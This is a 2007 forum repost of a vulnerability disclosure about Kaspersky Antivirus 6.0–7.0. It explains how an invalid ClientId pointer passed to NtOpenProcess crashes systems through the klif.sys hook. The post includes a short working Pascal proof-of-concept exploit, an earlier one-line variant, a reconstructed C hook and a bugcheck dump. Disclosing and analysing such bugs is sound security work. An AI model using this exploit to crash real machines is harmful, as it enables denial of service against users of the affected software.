查看: 2173|回复: 1
收起左侧

Exploiting Kaspersky Antivirus 6.0-7.0

[复制链接]
Anti
发表于 2007-6-9 10:29:18 | 显示全部楼层 |阅读模式
作者:EP_X0FF   
文章来源:天天安全网


Exploiting Kaspersky Antivirus 6.0-7.0

The reasons why we decided to post this material on rootkit.com is simple:

Well-known and really good Kaspersky Antivirus very long time suffers from very dangerous bug, which can be used as exploit and crash system protected by this antivirus down even from Guest account.
All attempts to inform Kaspersky Lab about this vulnerability was ignored. This material was posted some years ago, and in the last summer we posted new exploit for Kaspersky AV 6.0 which was based on previously discovered by Ms-Rem security hole. And nothing was changed. Even now with upcoming Kaspersky Antivirus 7.0 this exploit works very well.
The main goal of this exploit is calling NtOpenProcess with invalid parameters. This function is hooked by Kaspersky driver called klif.sys and reasons of its interception is obvious - this was made to protect Kaspersky AV from unauthorized access and closing by malware.

Here is prototype of this function

NTSYSAPI
NTSTATUS
NTAPI
NtOpenProcess( OUT PHANDLE ProcessHandle,
               IN ACCESS_MASK DesiredAccess,
               IN POBJECT_ATTRIBUTES ObjectAttributes,
               IN PCLIENT_ID ClientId OPTIONAL );


Here is a small exploit coded in pascal (worked well with klif.sys version 6.12.10.280 and previous versions)


var
  ob1: OBJECT_ATTRIBUTES;
  p1: DWORD;
begin
  ob1.Length := sizeof(ob1);
  NtOpenProcess(@p1, PROCESS_QUERY_INFORMATION, @ob1, pointer($82000000));
end;


As you see last parameter is CLIENT_ID structure - address and its points to invalid random memory region in kernel.
After starting this exploit on clean Windows XP, without KAV - no BSOD appears.
After starting this exploit on Windows XP protected by KAV 7.0 - we are getting immediately BSOD - PAGE_FAULT_IN_NONPAGED_AREA

Why this happened? Very simple explanation. The source of Hook on NtOpenProcess, I guess, looks like this:


NTSTATUS NewNtOpenProcess (
    OUT PHANDLE ProcessHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN PCLIENT_ID ClientId OPTIONAL)
{
    __try
   {

     if (ClientId->UniqueProcess == KasperskyProcesss) return STATUS_ACCESS_DENIED;

    else return RealNtOpenProcess(ProcessHandle, DesiredAccess,
                                  ObjectAttributes, ClientId);
   __except (EXCEPTION_EXECUTE_HANDLER)
   {
      ... stuff here ...
   }
}


The biggest mistake here is ClientId->UniqueProcess, since ClientId is a POINTER to structure. Accessing to invalid memory region causes immediately PAGE_FAULT_IN_NONPAGED_AREA.
Originally exploit was created by Ms-Rem and looks like


NtOpenProcess(NULL, (HANDLE)0, NULL, NULL);


Now as you see KAV developers have used try/except block, but as shows they don't know about MmIsAddressValid.

Hope now developers of Kaspersky Antivirus will discover for themself wonderful program called - NtCall and fix this bug.


*******************************************************************************
*                                                                             *
*                        Bugcheck Analysis                                    *
*                                                                             *
*******************************************************************************

PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced.  This cannot be protected by try-except,
it must be protected by a Probe.  Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: 83000000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: f941840c, If non-zero, the instruction address which referenced the bad memory
    address.
Arg4: 00000000, (reserved)

Debugging Details:
------------------

ANALYSIS: Kernel with unknown size. Will force reload symbols with known size.
ANALYSIS: Force reload command: .reload /f ntoskrnl.exe=FFFFFFFF804D7000,214600,41108004
***** Kernel symbols are WRONG. Please fix symbols to do analysis.

***** Kernel symbols are WRONG. Please fix symbols to do analysis.


MODULE_NAME: klif

FAULTING_MODULE: 804d7000 nt

DEBUG_FLR_IMAGE_TIMESTAMP:  46260f1c

READ_ADDRESS: unable to get nt!MmSpecialPoolStart
unable to get nt!MmSpecialPoolEnd
unable to get nt!MmPoolCodeStart
unable to get nt!MmPoolCodeEnd
83000000

FAULTING_IP:
klif+1940c
f941840c 0fbe08          movsx   ecx,byte ptr [eax]

MM_INTERNAL_CODE:  0

CUSTOMER_CRASH_COUNT:  1

DEFAULT_BUCKET_ID:  WRONG_SYMBOLS

BUGCHECK_STR:  0x50

LAST_CONTROL_TRANSFER:  from f941b39a to f941840c

STACK_TEXT:  
WARNING: Stack unwind information not available. Following frames may be wrong.
f64c8d24 f941b39a 83000000 00000008 00000000 klif+0x1940c
f64c8d64 7c90eb94 badb0d00 0012f3e4 00000000 klif+0x1c39a
f64c8d68 badb0d00 0012f3e4 00000000 00000000 0x7c90eb94
f64c8d6c 0012f3e4 00000000 00000000 00000000 0xbadb0d00
f64c8d70 00000000 00000000 00000000 00000000 0x12f3e4


STACK_COMMAND:  kb

FOLLOWUP_IP:
klif+1940c
f941840c 0fbe08          movsx   ecx,byte ptr [eax]

SYMBOL_STACK_INDEX:  0

FOLLOWUP_NAME:  MachineOwner

IMAGE_NAME:  klif.sys

SYMBOL_NAME:  klif+1940c

BUCKET_ID:  WRONG_SYMBOLS

Followup: MachineOwner


Kind Regards,
EP_X0FF/UG North
wangjay1980
发表于 2007-6-9 10:45:57 | 显示全部楼层
这个已经有人向官方发去了

[ 本帖最后由 wangjay1980 于 2007-6-9 11:15 编辑 ]
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-29 05:29 , Processed in 0.119393 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表